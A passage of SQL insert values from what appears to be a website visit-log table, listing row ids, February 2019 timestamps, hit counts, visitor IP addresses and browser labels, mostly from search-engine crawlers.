,0,0,'66.249.66.152','chrome'),(383427,1549571683,2,2,0,0,'207.46.13.184','other'),(383428,1549571940,1,1,0,0,'178.92.249.162','chrome'),(383429,1549572081,1,1,0,0,'91.196.178.189','other'),(383430,1549572101,1,1,0,0,'91.196.178.129','chrome'),(383431,1549572365,1,1,0,0,'54.36.149.70','other'),(383432,1549572372,1,1,0,0,'54.36.148.172','other'),(383433,1549573056,1,1,0,0,'40.77.167.97','other'),(383434,1549573057,1,1,0,0,'91.196.178.175','chrome'),(383435,1549573059,1,1,0,0,'66.249.66.146','chrome'),(383436,1549573082,1,1,0,0,'54.36.149.83','other'),(383437,1549573385,1,1,0,0,'54.36.149.58','other'),(383438,1549573466,1,1,0,0,'54.36.148.26','other'),(383439,1549573543,1,1,0,0,'66.249.66.42','chrome'),(383440,1549573580,1,1,0,0,'3.91.2.189','other'),(383441,1549574366,1,1,0,0,'128.69.166.41','msie'),(383442,1549575025,1,1,0,0,'8.29.198.27','other'),(383443,1549575287,1,1,0,0,'54.36.148.86','other'),(383444,1549575408,1,1,0,0,'66.249.66.152','chrome'),(383445,1549575788,1,1,0,0,'66.249.66.156','chrome'),(383446,1549575802,1,1,0,0,'54.36.148.113','other'),(383447,1549575947,1,1,0,0,'54.36.148.167','other'),(383448,1549575996,1,1,0,0,'66.249.66.42','chrome'),(383449,1549576152,1,1,0,0,'207.46.13.184','other'),(383450,1549576492,1,1,0,0,'216.244.66.241','other'),(383451,1549576526,1,1,0,0,'95.132.8.98','chrome'),(383452,1549576596,1,1,0,0,'66.249.66.154','chrome'),(383453,1549576645,1,1,0,0,'8.29.198.27','other'),(383454,1549576673,1,1,0,0,'54.36.148.218','other'),(383455,1549576749,2,2,0,0,'66.249.66.156','chrome'),(383456,1549577034,1,1,0,0,'54.36.149.37','other'),(383457,1549577123,1,1,0,0,'66.249.66.152','chrome'),(383458,1549577273,1,1,0,0,'207.241.229.33','other'),(383459,1549577323,1,1,0,0,'54.36.148.43','other'),(383460,1549577366,1,1,0,0,'54.36.148.143','other'),(383461,1549577821,1,1,0,0,'37.73.202.157','chrome'),(383462,1549578534,1,1,0,0,'54.36.148.21','other'),(383463,1549578591,1,1,0,0,'54.36.148.249','other'),(383464,1549578887,1,1,0,0,'54.36.148.245','other'),(383465,1549579346,1,1,0,0,'80.252.154.233','firefox'),(383466,1549579589,1,1,0,0,'54.36.148.127','other'),(383467,1549579785,3,3,0,0,'40.77.167.97','other'),(383468,1549579901,1,1,0,0,'54.36.148.136','other'),(383469,1549579939,1,1,0,0,'5.45.207.19','other'),(383470,1549579979,1,1,0,0,'54.36.148.249','other'),(383471,1549580008,1,1,0,0,'207.46.13.103','other'),(383472,1549580064,1,1,0,0,'54.36.148.99','other'),(383473,1549580399,1,1,0,0,'60.191.38.77','firefox'),(383474,1549580455,1,1,0,0,'66.249.66.154','chrome'),(383475,1549580658,5,5,0,0,'207.46.13.184','other'),(383476,1549581096,1,1,0,0,'54.36.148.30','other'),(383477,1549581169,1,1,0,0,'207.46.13.103','other'),(383478,1549581311,1,1,0,0,'54.36.149.69','other'),(383479,1549581479,1,1,0,0,'54.36.148.54','other'),(383480,1549581517,1,1,0,0,'46.229.168.135','other'),(383481,1549581529,1,1,0,0,'54.36.148.188','other'),(383482,1549581673,1,1,0,0,'216.244.66.241','other'),(383483,1549582156,1,1,0,0,'54.36.148.53','other'),(383484,1549582194,1,1,0,0,'66.249.66.156','chrome'),(383485,1549582624,1,1,0,0,'207.46.13.103','other'),(383486,1549583301,1,1,0,0,'46.188.32.25','msie'),(383487,1549583572,1,1,0,0,'54.36.149.25','other'),(383488,1549583999,1,1,0,0,'54.36.149.0','other'),(383489,1549584018,1,1,0,0,'54.36.148.191','other'),(383490,1549584045,1,1,0,0,'54.36.148.25','other'),(383491,1549584157,1,1,0,0,'54.36.148.119','other'),(383492,1549584520,1,1,0,0,'66.249.66.152','chrome'),(383493,1549584784,1,1,0,0,'54.36.148.216','other'),(383494,1549584834,1,1,0,0,'54.36.148.125','other'),(383495,1549584973,1,1,0,0,'54.36.149.5','other'),(383496,1549585063,1,1,0,0,'54.36.148.58','other'),(383497,1549585122,1,1,0,0,'54.36.148.218','other'),(383498,1549585373,1,1,0,0,'54.36.148.153','other'),(383499,1549585619,1,1,0,0,'54.36.148.19','other'),(383500,1549585821,1,1,0,0,'66.249.66.156','chrome'),(383501,1549585866,1,1,0,0,'8.29.198.25','other'),(383502,1549585875,1,1,0,0,'54.36.149.70','other'),(383503,1549585885,1,1,0,0,'66.249.66.152','chrome'),(383504,1549586242,1,1,0,0,'207.46.13.103','other'),(383505,1549586403,1,1,0,0,'54.36.149.3','other'),(383506,1549586606,1,1,0,0,'46.229.168.151','other'),(383507,1549586985,1,1,0,0,'180.76.15.5','other'),(383508,1549587262,1,1,0,0,'54.36.148.40','other'),(383509,1549587312,1,1,0,0,'185.220.102.6','other'),(383510,1549587358,1,1,0,0,'40.77.167.97','other'),(383511,1549587487,1,1,0,0,'8.29.198.25','other'),(383512,1549587496,1,1,0,0,'66.249.66.154','chrome'),(383513,1549588028,15,15,0,0,'66.249.66.152','chrome'),(383514,1549588098,1,1,0,0,'54.36.148.87','other'),(383515,1549588194,1,1,0,0,'54.36.148.166','other'),(383516,1549588616,7,7,0,0,'66.249.66.154','chrome'),(383517,1549588803,3,3,0,0,'66.249.66.156','chrome'),(383518,1549588848,1,1,0,0,'54.36.148.46','other'),(383519,1549588957,5,5,0,0,'66.249.66.152','chrome'),(383520,1549589004,1,1,0,0,'54.36.149.31','other'),(383521,1549589071,1,1,0,0,'54.36.148.230','other'),(383522,1549589093,1,1,0,0,'54.36.149.56','other'),(383523,1549589102,1,1,0,0,'54.36.148.187','other'),(383524,1549589142,1,1,0,0,'54.36.148.109','other'),(383525,1549589185,1,1,0,0,'54.36.148.119','other'),(383526,1549589209,3,3,0,0,'66.249.66.42','chrome'),(383527,1549589403,1,1,0,0,'66.249.66.40','chrome'),(383528,1549589451,1,1,0,0,'40.77.167.97','other'),(383529,1549589566,1,1,0,0,'46.229.168.135','other'),(383530,1549589782,3,3,0,0,'66.249.66.156','chrome'),(383531,1549589900,1,1,0,0,'54.36.149.89','other'),(383532,1549589904,5,5,0,0,'66.249.66.152','chrome'),(383533,1549590561,4,4,0,0,'66.249.66.154','chrome'),(383534,1549590858,3,3,0,0,'66.249.66.152','chrome'),(383535,1549590902,1,1,0,0,'54.36.148.74','other'),(383536,1549591070,1,1,0,0,'54.36.149.7','other'),(383537,1549591565,1,1,0,0,'46.229.168.137','other'),(383538,1549591786,1,1,0,0,'46.229.168.133','other'),(383539,1549592078,1,1,0,0,'54.36.149.86','other'),(383540,1549592156,1,1,0,0,'54.36.148.95','other'),(383541,1549592258,1,1,0,0,'54.36.148.155','other'),(383542,1549592307,1,1,0,0,'66.249.66.44','chrome'),(383543,1549592539,1,1,0,0,'54.36.148.85','other'),(383544,1549593148,1,1,0,0,'66.249.66.154','chrome'),(383545,1549593535,1,1,0,0,'54.36.149.24','other'),(383546,1549593656,1,1,0,0,'54.36.149.64','other'),(383547,1549593797,1,1,0,0,'54.36.149.90','other'),(383548,1549593857,1,1,0,0,'54.36.149.35','other'),(383549,1549594053,1,1,0,0,'66.249.66.44','chrome'),(383550,1549594378,1,1,0,0,'207.46.13.184','other'),(383551,1549594473,1,1,0,0,'46.229.168.148','other'),(383552,1549594608,1,1,0,0,'54.36.148.35','other'),(383553,1549594691,1,1,0,0,'66.249.66.152','chrome'),(383554,1549594734,1,1,0,0,'54.36.148.103','other'),(383555,1549595109,1,1,0,0,'66.249.66.156','chrome'),(383556,1549595210,1,1,0,0,'54.36.148.227','other'),(383557,1549595318,1,1,0,0,'54.36.148.67','other'),(383558,1549595424,1,1,0,0,'209.17.96.202','other'),(383559,1549595512,1,1,0,0,'54.36.148.186','other'),(383560,1549595862,1,1,0,0,'54.36.149.25','other'),(383561,1549595894,1,1,0,0,'95.163.255.155','other'),(383562,1549595899,1,1,0,0,'95.163.255.197','other'),(383563,1549596475,1,1,0,0,'66.249.66.154','chrome'),(383564,1549596706,1,1,0,0,'46.229.168.144','other'),(383565,1549596707,1,1,0,0,'54.36.148.54','other'),(383566,1549596712,1,1,0,0,'8.29.198.26','other'),(383567,1549596742,1,1,0,0,'54.36.148.242','other'),(383568,1549597140,1,1,0,0,'54.36.148.147','other'),(383569,1549597319,1,1,0,0,'54.36.148.79','other'),(383570,1549597352,1,1,0,0,'207.46.13.216','other'),(383571,1549597394,1,1,0,0,'13.57.233.99','chrome'),(383572,1549597468,1,1,0,0,'54.36.149.84','other'),(383573,1549597592,1,1,0,0,'54.36.149.24','other'),(383574,1549597995,1,1,0,0,'157.55.39.134','other'),(383575,1549598122,1,1,0,0,'207.46.13.184','other'),(383576,1549598170,1,1,0,0,'54.36.149.31','other'),(383577,1549598315,1,1,0,0,'8.29.198.25','other'),(383578,1549598631,1,1,0,0,'46.229.168.134','other'),(383579,1549599203,1,1,0,0,'54.36.149.7','other'),(383580,1549599222,1,1,0,0,'54.36.149.102','other'),(383581,1549599549,1,1,0,0,'54.36.149.75','other'),(383582,1549599611,1,1,0,0,'54.36.148.146','other'),(383583,1549599642,1,1,0,0,'54.36.148.81','other'),(383584,1549599705,1,1,0,0,'207.46.13.184','other'),(383585,1549599739,1,1,0,0,'54.36.148.233','other'),(383586,1549600112,1,1,0,0,'128.72.43.167','other'),(383587,1549600130,1,1,0,0,'54.36.148.92','other'),(383588,1549600136,1,1,0,0,'54.36.149.43','other'),(383589,1549600162,1,1,0,0,'54.36.148.54','other'),(383590,1549600165,2,2,0,0,'54.36.148.82','other'),(383591,1549600369,1,1,0,0,'157.55.39.134','other'),(383592,1549600886,1,1,0,0,'54.36.148.128','other'),(383593,1549601092,1,1,0,0,'54.36.148.140','other'),(383594,1549601553,1,1,0,0,'180.76.15.8','other'),(383595,1549601914,1,1,0,0,'46.229.168.129','other'),(383596,1549602040,1,1,0,0,'54.36.148.93','other'),(383597,1549602047,1,1,0,0,'54.36.148.132','other'),(383598,1549602091,1,1,0,0,'66.249.66.44','chrome'),(383599,1549602185,1,1,0,0,'54.36.148.236','other'),(383600,1549602453,1,1,0,0,'54.36.148.124','other'),(383601,1549602986,1,1,0,0,'54.36.148.221','other'),(383602,1549603059,1,1,0,0,'54.36.148.51','other'),(383603,1549603208,1,1,0,0,'95.163.255.157','other'),(383604,1549603259,3,3,0,0,'216.244.66.241','other'),(383605,1549603762,1,1,0,0,'46.229.168.135','other'),(383606,1549604040,1,1,0,0,'54.36.148.145','other'),(383607,1549604387,1,1,0,0,'54.36.148.98','other'),(383608,1549604444,2,2,0,0,'66.249.66.154','chrome'),(383609,1549604836,1,1,0,0,'66.249.66.42','chrome'),(383610,1549604875,2,2,0,0,'52.32.164.39','chrome'),(383611,1549605023,1,1,0,0,'54.36.148.195','other'),(383612,1549605065,1,1,0,0,'54.36.149.36','other'),(383613,1549605495,1,1,0,0,'54.36.149.23','other'),(383614,1549605833,1,1,0,0,'54.36.149.9','other'),(383615,1549606131,1,1,0,0,'54.36.148.19','other'),(383616,1549606295,7,7,0,0,'46.4.63.250','other'),(383617,1549606484,1,1,0,0,'91.196.178.100','chrome'),(383618,1549606620,1,1,0,0,'192.42.116.28','other'),(383619,1549606689,1,1,0,0,'54.36.149.14','other'),(383620,1549607171,1,1,0,0,'54.36.148.200','other'),(383621,1549607241,2,2,0,0,'157.55.39.250','other'),(383622,1549607250,1,1,0,0,'54.36.148.195','other'),(383623,1549607358,1,1,0,0,'54.36.149.4','other'),(383624,1549607514,1,1,0,0,'37.73.185.60','chrome'),(383625,1549607554,1,1,0,0,'8.29.198.27','other'),(383626,1549607583,1,1,0,0,'66.249.66.44','chrome'),(383627,1549607832,1,1,0,0,'91.196.178.93','chrome'),(383628,1549607941,1,1,0,0,'54.36.148.17','other'),(383629,1549608378,1,1,0,0,'91.196.178.172','chrome'),(383630,1549608402,1,1,0,0,'66.249.66.154','chrome'),(383631,1549608700,1,1,0,0,'209.17.97.122','other'),(383632,1549608800,1,1,0,0,'91.196.178.93','chrome'),(383633,1549608863,1,1,0,0,'54.36.148.95','other'),(383634,1549608898,1,1,0,0,'46.201.112.159','chrome'),(383635,1549608981,1,1,0,0,'46.229.168.132','other'),(383636,1549609147,1,1,0,0,'8.29.198.27','other'),(383637,1549609206,1,1,0,0,'46.200.63.3','chrome'),(383638,1549609421,1,1,0,0,'46.229.168.137','other'),(383639,1549609636,1,1,0,0,'54.36.148.59','other'),(383640,1549609639,1,1,0,0,'46.229.168.144','other'),(383641,1549609701,1,1,0,0,'54.36.149.38','other'),(383642,1549609826,1,1,0,0,'91.196.178.36','chrome'),(383643,1549609937,1,1,0,0,'54.36.148.34','other'),(383644,1549610003,1,1,0,0,'80.93.126.230','chrome'),(383645,1549610055,1,1,0,0,'66.249.66.156','chrome'),(383646,1549610475,1,1,0,0,'66.249.66.152','chrome'),(383647,1549610917,1,1,0,0,'54.36.148.70','other'),(383648,1549611001,1,1,0,0,'46.229.168.151','other'),(383649,1549611009,1,1,0,0,'54.36.148.169','other'),(383650,1549611103,1,1,0,0,'54.36.148.218','other'),(383651,1549611573,1,1,0,0,'54.36.148.246','other'),(383652,1549611945,1,1,0,0,'80.93.126.230','chrome'),(383653,1549612054,1,1,0,0,'46.229.168.150','other'),(383654,1549612181,1,1,0,0,'40.77.167.201','other'),(383655,1549612234,1,1,0,0,'95.134.74.240','chrome'),(383656,1549612411,1,1,0,0,'178.92.142.54','chrome'),(383657,1549612621,1,1,0,0,'91.124.182.170','firefox'),(383658,1549612678,1,1,0,0,'54.36.148.133','other'),(383659,1549612813,1,1,0,0,'95.163.255.191','other'),(383660,1549613151,1,1,0,0,'54.36.148.202','other'),(383661,1549613477,1,1,0,0,'91.196.178.85','chrome'),(383662,1549613634,1,1,0,0,'46.229.168.138','other'),(383663,1549613762,1,1,0,0,'66.249.66.42','chrome'),(383664,1549613817,1,1,0,0,'95.163.255.197','other'),(383665,1549613832,1,1,0,0,'54.36.148.57','other'),(383666,1549613982,1,1,0,0,'54.36.148.214','other'),(383667,1549614190,1,1,0,0,'54.36.148.47','other'),(383668,1549614354,1,1,0,0,'54.36.148.51','other'),(383669,1549614408,2,2,0,0,'91.196.178.93','chrome'),(383670,1549614439,1,1,0,0,'95.163.255.165','other'),(383671,1549614556,2,2,0,0,'216.244.66.241','other'),(383672,1549614632,1,1,0,0,'66.249.66.156','chrome'),(383673,1549614939,1,1,0,0,'54.36.148.178','other'),(383674,1549614975,1,1,0,0,'54.36.148.172','other'),(383675,1549615332,1,1,0,0,'54.36.148.159','other'),(383676,1549615387,1,1,0,0,'37.55.220.211','chrome'),(383677,1549615632,1,1,0,0,'91.196.178.93','chrome'),(383678,1549615749,1,1,0,0,'54.36.148.12','other'),(383679,1549616006,1,1,0,0,'46.229.168.150','other'),(383680,1549616019,1,1,0,0,'66.249.66.154','chrome'),(383681,1549616425,1,1,0,0,'46.211.226.143','chrome'),(383682,1549616492,1,1,0,0,'94.178.134.33','chrome'),(383683,1549616520,1,1,0,0,'91.196.178.85','chrome'),(383684,1549616755,1,1,0,0,'54.36.148.34','other'),(383685,1549616803,1,1,0,0,'54.36.148.184','other'),(383686,1549616899,1,1,0,0,'95.132.24.66','chrome'),(383687,1549617231,1,1,0,0,'54.36.148.227','other'),(383688,1549617670,1,1,0,0,'95.163.255.161','other'),(383689,1549617770,1,1,0,0,'54.36.148.197','other'),(383690,1549617851,1,1,0,0,'54.36.148.246','other'),(383691,1549617954,1,1,0,0,'40.77.167.81','other'),(383692,1549618188,1,1,0,0,'54.36.148.232','other'),(383693,1549618246,1,1,0,0,'54.36.148.238','other'),(383694,1549618408,1,1,0,0,'54.36.148.173','other'),(383695,1549618428,1,1,0,0,'8.29.198.27','other'),(383696,1549618499,1,1,0,0,'46.229.168.152','other'),(383697,1549618501,1,1,0,0,'54.36.148.152','other'),(383698,1549618596,1,1,0,0,'95.163.255.93','other'),(383699,1549618615,1,1,0,0,'66.249.66.156','chrome'),(383700,1549618648,1,1,0,0,'91.196.178.93','chrome'),(383701,1549618691,1,1,0,0,'195.34.204.153','chrome'),(383702,1549619017,1,1,0,0,'40.77.167.117','other'),(383703,1549619090,1,1,0,0,'54.36.148.73','other'),(383704,1549619116,1,1,0,0,'54.36.148.114','other'),(383705,1549619134,1,1,0,0,'91.196.178.131','chrome'),(383706,1549619135,1,1,0,0,'46.229.168.139','other'),(383707,1549619533,1,1,0,0,'46.229.168.130','other'),(383708,1549619632,1,1,0,0,'216.244.66.241','other'),(383709,1549619992,1,1,0,0,'8.29.198.26','other'),(383710,1549620121,1,1,0,0,'91.196.178.93','chrome'),(383711,1549620391,1,1,0,0,'46.229.168.145','other'),(383712,1549620506,1,1,0,0,'78.111.185.163','chrome'),(383713,1549620575,1,1,0,0,'66.220.149.31','other'),(383714,1549620576,1,1,0,0,'173.252.87.12','other'),(383717,1549620875,1,1,0,0,'46.211.71.141','chrome'),(383718,1549620876,1,1,0,0,'66.249.66.156','chrome'),(383719,1549620963,1,1,0,0,'66.249.66.152','chrome'),(383720,1549621019,1,1,0,0,'54.36.148.130','other'),(383721,1549621037,1,1,0,0,'46.229.168.147','other'),(383722,1549621059,2,2,0,0,'66.249.66.154','chrome'),(383723,1549621147,1,1,0,0,'54.36.148.190','other'),(383724,1549621221,2,2,0,0,'66.249.66.44','chrome'),(383725,1549621909,1,1,0,0,'157.55.39.250','other'),(383726,1549622282,1,1,0,0,'54.36.148.134','other'),(383727,1549622524,1,1,0,0,'54.36.149.67','other'),(383728,1549622683,2,2,0,0,'216.244.66.241','other'),(383729,1549622948,1,1,0,0,'66.249.66.154','chrome'),(383730,1549622993,1,1,0,0,'157.55.39.69','other'),(383731,1549623100,1,1,0,0,'46.37.194.15','firefox'),(383732,1549623141,1,1,0,0,'91.196.178.93','chrome'),(383733,1549623363,1,1,0,0,'40.77.167.47','other'),(383734,1549623390,1,1,0,0,'91.196.177.46','firefox'),(383735,1549624229,1,1,0,0,'216.244.66.241','other'),(383736,1549624598,1,1,0,0,'46.229.168.130','other'),(383737,1549624627,1,1,0,0,'46.229.168.142','other'),(383738,1549624720,1,1,0,0,'78.111.185.163','chrome'),(383739,1549624733,1,1,0,0,'54.36.148.15','other'),(383740,1549624849,1,1,0,0,'54.36.149.59','other'),(383741,1549625007,1,1,0,0,'54.36.149.8','other'),(383742,1549625367,1,1,0,0,'66.249.66.154','chrome'),(383743,1549625569,1,1,0,0,'95.163.255.184','other'),(383744,1549626581,2,2,0,0,'46.229.168.147','other'),(383745,1549626959,1,1,0,0,'91.196.178.169','chrome'),(383746,1549627049,1,1,0,0,'66.249.66.152','chrome'),(383747,1549627120,1,1,0,0,'54.36.148.73','other'),(383748,1549627135,1,1,0,0,'54.36.148.247','other'),(383749,1549627399,1,1,0,0,'54.36.149.60','other'),(383750,1549627514,2,2,0,0,'216.244.66.241','other'),(383751,1549628021,1,1,0,0,'195.78.69.16','firefox'),(383752,1549628240,1,1,0,0,'40.77.167.47','other'),(383753,1549628415,1,1,0,0,'91.196.178.93','chrome'),(383754,1549628760,1,1,0,0,'66.249.66.44','chrome'),(383755,1549628800,2,2,0,0,'157.55.39.141','other'),(383756,1549628823,1,1,0,0,'78.111.185.163','chrome'),(383757,1549628941,1,1,0,0,'95.108.213.4','other'),(383758,1549629027,1,1,0,0,'5.45.207.19','other'),(383759,1549629059,1,1,0,0,'46.229.168.143','other'),(383760,1549629067,1,1,0,0,'141.8.142.103','other'),(383761,1549629117,1,1,0,0,'178.154.244.11','other'),(383762,1549629203,1,1,0,0,'66.249.66.154','chrome'),(383763,1549629243,1,1,0,0,'54.36.148.34','other'),(383764,1549629276,1,1,0,0,'8.29.198.25','other'),(383765,1549629292,2,2,0,0,'5.45.207.79','other'),(383766,1549629385,1,1,0,0,'91.196.178.93','chrome'),(383767,1549629486,1,1,0,0,'54.36.149.22','other'),(383768,1549629652,1,1,0,0,'95.163.255.183','other'),(383769,1549629733,1,1,0,0,'54.36.148.58','other'),(383770,1549629781,1,1,0,0,'54.36.148.20','other'),(383771,1549629840,1,1,0,0,'54.36.148.144','other'),(383772,1549630003,2,2,0,0,'95.108.213.4','other'),(383773,1549630042,1,1,0,0,'5.45.207.19','other'),(383774,1549630122,1,1,0,0,'141.8.142.103','other'),(383775,1549630164,1,1,0,0,'54.36.148.156','other'),(383776,1549630282,1,1,0,0,'46.229.168.147','other'),(383777,1549630502,1,1,0,0,'54.36.148.23','other'),(383778,1549630503,1,1,0,0,'37.9.113.148','other'),(383779,1549630524,1,1,0,0,'178.154.244.11','other'),(383780,1549630567,1,1,0,0,'46.211.129.65','chrome'),(383781,1549630574,1,1,0,0,'54.36.148.43','other'),(383782,1549630628,1,1,0,0,'46.229.168.133','other'),(383783,1549630636,1,1,0,0,'54.36.149.8','other'),(383784,1549630825,1,1,0,0,'8.29.198.27','other'),(383785,1549630855,1,1,0,0,'54.36.148.173','other'),(383786,1549630890,1,1,0,0,'91.196.177.46','firefox'),(383787,1549631005,1,1,0,0,'157.55.39.193','other'),(383788,1549631052,1,1,0,0,'141.8.142.103','other'),(383789,1549631133,1,1,0,0,'54.36.149.53','other'),(383790,1549631211,1,1,0,0,'5.45.207.19','other'),(383791,1549631233,1,1,0,0,'91.209.11.236','other'),(383792,1549631792,2,2,0,0,'66.249.66.42','chrome'),(383793,1549632426,1,1,0,0,'66.249.66.44','chrome'),(383794,1549632658,1,1,0,0,'66.249.66.152','chrome'),(383795,1549633195,1,1,0,0,'95.163.255.93','other'),(383796,1549633230,2,2,0,0,'157.55.39.193','other'),(383797,1549633356,1,1,0,0,'54.36.148.160','other'),(383798,1549633393,1,1,0,0,'66.249.66.40','chrome'),(383799,1549633535,2,2,0,0,'81.23.16.43','other'),(383800,1549633537,1,1,0,0,'54.36.148.185','other'),(383801,1549633783,1,1,0,0,'54.36.149.106','other'),(383802,1549633802,1,1,0,0,'46.229.168.137','other'),(383803,1549633908,1,1,0,0,'54.36.148.34','other'),(383804,1549634068,1,1,0,0,'54.36.148.151','other'),(383805,1549634114,1,1,0,0,'91.196.178.176','chrome'),(383806,1549634142,1,1,0,0,'54.36.149.63','other'),(383807,1549634367,1,1,0,0,'66.249.66.154','chrome'),(383808,1549634486,1,1,0,0,'46.229.168.132','other'),(383809,1549634671,1,1,0,0,'66.249.66.40','chrome'),(383810,1549634724,1,1,0,0,'54.36.148.203','other'),(383811,1549634862,1,1,0,0,'66.249.66.152','chrome'),(383812,1549634909,1,1,0,0,'54.36.148.124','other'),(383813,1549634962,1,1,0,0,'46.229.168.151','other'),(383814,1549635015,1,1,0,0,'54.36.148.99','other'),(383815,1549635202,1,1,0,0,'157.55.39.193','other'),(383816,1549635281,1,1,0,0,'95.163.255.154','other'),(383817,1549635594,1,1,0,0,'46.229.168.133','other'),(383818,1549636056,2,2,0,0,'66.249.66.152','chrome'),(383819,1549636063,1,1,0,0,'66.249.66.154','chrome'),(383820,1549636068,2,2,0,0,'40.77.167.116','other'),(383821,1549636125,1,1,0,0,'91.196.178.79','firefox'),(383822,1549636408,1,1,0,0,'46.229.168.130','other'),(383823,1549636671,1,1,0,0,'54.36.149.29','other'),(383824,1549636682,1,1,0,0,'95.163.255.171','other'),(383825,1549636780,1,1,0,0,'54.36.148.80','other'),(383826,1549636987,1,1,0,0,'54.36.148.166','other'),(383827,1549637125,1,1,0,0,'207.46.13.37','other'),(383828,1549637128,1,1,0,0,'40.77.167.116','other'),(383829,1549637377,1,1,0,0,'46.229.168.148','other'),(383830,1549637527,1,1,0,0,'91.196.179.65','other'),(383831,1549637605,1,1,0,0,'54.36.149.60','other'),(383832,1549637740,1,1,0,0,'95.163.255.97','other'),(383833,1549638196,1,1,0,0,'157.55.39.193','other'),(383834,1549638341,1,1,0,0,'40.77.167.116','other'),(383835,1549638417,1,1,0,0,'66.249.66.152','chrome'),(383836,1549638488,1,1,0,0,'66.249.66.156','chrome'),(383837,1549638664,1,1,0,0,'54.36.148.99','other'),(383838,1549638798,2,2,0,0,'216.244.66.241','other'),(383839,1549639074,1,1,0,0,'54.36.149.36','other'),(383840,1549639112,1,1,0,0,'54.36.148.69','other'),(383841,1549639143,1,1,0,0,'46.229.168.133','other'),(383842,1549639357,1,1,0,0,'66.249.66.154','chrome'),(383843,1549639444,1,1,0,0,'91.209.11.236','other'),(383844,1549639823,1,1,0,0,'157.55.39.141','other'),(383845,1549640113,1,1,0,0,'8.29.198.27','other'),(383846,1549640440,1,1,0,0,'54.36.148.172','other'),(383847,1549640653,1,1,0,0,'54.36.148.61','other'),(383848,1549640949,1,1,0,0,'46.229.168.152','other'),(383849,1549641040,1,1,0,0,'66.249.66.156','chrome'),(383850,1549641309,1,1,0,0,'46.229.168.142','other'),(383851,1549641563,1,1,0,0,'54.36.149.106','other'),(383852,1549641664,1,1,0,0,'8.29.198.26','other'),(383853,1549642240,1,1,0,0,'54.36.148.90','other'),(383854,1549642404,1,1,0,0,'54.36.149.97','other'),(383855,1549642532,1,1,0,0,'157.55.39.193','other'),(383856,1549643051,1,1,0,0,'46.229.168.135','other'),(383857,1549643655,1,1,0,0,'180.76.15.15','other'),(383858,1549644034,1,1,0,0,'194.44.28.114','firefox'),(383859,1549644481,1,1,0,0,'207.46.13.216','other'),(383860,1549644889,1,1,0,0,'54.36.148.36','other'),(383861,1549644974,2,2,0,0,'91.209.11.236','other'),(383862,1549645059,1,1,0,0,'66.249.66.156','chrome'),(383863,1549645675,1,1,0,0,'54.36.149.40','other'),(383864,1549645770,1,1,0,0,'207.46.13.216','other'),(383865,1549646055,1,1,0,0,'46.229.168.133','other'),(383866,1549646449,1,1,0,0,'95.163.255.177','other'),(383867,1549646467,1,1,0,0,'54.36.148.194','other'),(383868,1549646528,1,1,0,0,'54.36.148.111','other'),(383869,1549646690,1,1,0,0,'54.36.148.35','other'),(383870,1549646901,1,1,0,0,'46.229.168.135','other'),(383871,1549646989,1,1,0,0,'54.36.148.156','other'),(383872,1549647441,1,1,0,0,'66.249.66.40','chrome'),(383873,1549647463,1,1,0,0,'40.77.167.98','other'),(383874,1549647555,1,1,0,0,'54.36.149.74','other'),(383875,1549647561,1,1,0,0,'66.249.66.152','chrome'),(383876,1549647748,2,2,0,0,'91.196.178.37','chrome'),(383877,1549647781,1,1,0,0,'54.36.149.12','other'),(383878,1549647788,1,1,0,0,'46.229.168.148','other'),(383879,1549647815,1,1,0,0,'54.36.148.116','other'),(383880,1549647913,1,1,0,0,'95.163.255.154','other'),(383881,1549648166,1,1,0,0,'46.229.168.129','other'),(383882,1549648430,1,1,0,0,'54.36.148.192','other'),(383883,1549648692,2,2,0,0,'66.249.66.154','chrome'),(383884,1549648745,1,1,0,0,'54.36.148.47','other'),(383885,1549649097,1,1,0,0,'54.36.148.71','other'),(383886,1549649185,1,1,0,0,'91.196.178.37','chrome'),(383887,1549649608,1,1,0,0,'216.244.66.241','other'),(383888,1549649617,1,1,0,0,'54.36.148.45','other'),(383889,1549649890,1,1,0,0,'54.36.149.11','other'),(383890,1549650007,1,1,0,0,'46.229.168.134','other'),(383891,1549650224,1,1,0,0,'54.36.148.25','other'),(383892,1549650535,1,1,0,0,'54.36.148.141','other'),(383893,1549650563,1,1,0,0,'54.36.149.71','other'),(383894,1549650575,1,1,0,0,'46.229.168.143','other'),(383895,1549650604,1,1,0,0,'54.36.148.111','other'),(383896,1549650948,1,1,0,0,'8.29.198.27','other'),(383897,1549650997,2,2,0,0,'66.249.66.152','chrome'),(383898,1549651049,1,1,0,0,'91.196.178.58','chrome'),(383899,1549651275,1,1,0,0,'91.196.178.61','chrome'),(383900,1549651367,1,1,0,0,'54.36.149.3','other'),(383901,1549651429,1,1,0,0,'54.36.148.95','other'),(383902,1549651453,1,1,0,0,'95.163.255.174','other'),(383903,1549651502,2,2,0,0,'54.36.148.204','other'),(383904,1549651814,1,1,0,0,'54.36.148.194','other'),(383905,1549651834,1,1,0,0,'5.188.210.53','chrome'),(383906,1549652490,1,1,0,0,'8.29.198.26','other'),(383907,1549652989,2,2,0,0,'66.249.66.152','chrome'),(383908,1549653976,1,1,0,0,'54.36.148.110','other'),(383909,1549654025,1,1,0,0,'91.196.178.37','chrome'),(383910,1549654284,1,1,0,0,'54.36.148.158','other'),(383911,1549654585,1,1,0,0,'54.36.148.48','other'),(383912,1549655445,1,1,0,0,'95.163.255.92','other'),(383913,1549655597,1,1,0,0,'54.36.148.225','other'),(383914,1549655704,1,1,0,0,'46.229.168.132','other'),(383915,1549655883,1,1,0,0,'46.229.168.150','other'),(383916,1549656047,1,1,0,0,'207.46.13.168','other'),(383917,1549656131,1,1,0,0,'207.46.13.157','other'),(383918,1549656383,1,1,0,0,'54.36.148.71','other'),(383919,1549656794,1,1,0,0,'46.229.168.135','other'),(383920,1549657028,1,1,0,0,'46.229.168.130','other'),(383921,1549657132,1,1,0,0,'37.9.113.148','other'),(383922,1549657136,1,1,0,0,'178.154.244.65','other'),(383923,1549657359,2,2,0,0,'216.244.66.241','other'),(383924,1549658074,1,1,0,0,'54.36.149.56','other'),(383925,1549658112,2,2,0,0,'66.249.66.154','chrome'),(383926,1549658653,1,1,0,0,'54.36.149.92','other'),(383927,1549658995,3,3,0,0,'91.209.11.236','other'),(383928,1549659027,2,2,0,0,'66.249.66.152','chrome'),(383929,1549659219,1,1,0,0,'207.46.13.160','other'),(383930,1549660018,1,1,0,0,'95.163.255.92','other'),(383931,1549660167,1,1,0,0,'95.163.255.95','other'),(383932,1549660315,2,2,0,0,'207.46.13.168','other'),(383933,1549660378,1,1,0,0,'216.244.66.241','other'),(383934,1549660462,1,1,0,0,'91.209.11.236','other'),(383935,1549660464,1,1,0,0,'40.77.167.19','other'),(383936,1549661285,1,1,0,0,'66.249.